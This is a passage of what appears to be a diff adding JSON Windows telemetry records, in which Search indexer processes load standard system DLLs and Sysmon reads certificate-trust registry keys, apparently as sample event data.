"C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915900000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + 